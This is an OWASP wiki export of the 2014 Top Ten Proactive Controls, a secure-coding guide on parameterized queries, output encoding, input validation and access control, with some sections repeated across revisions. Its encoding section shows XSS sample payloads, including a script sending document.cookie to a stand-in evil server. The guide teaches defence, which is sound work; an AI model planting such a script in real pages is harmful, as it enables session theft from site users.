<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176252OWASP Proactive Controls2014-06-02T15:47:44Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
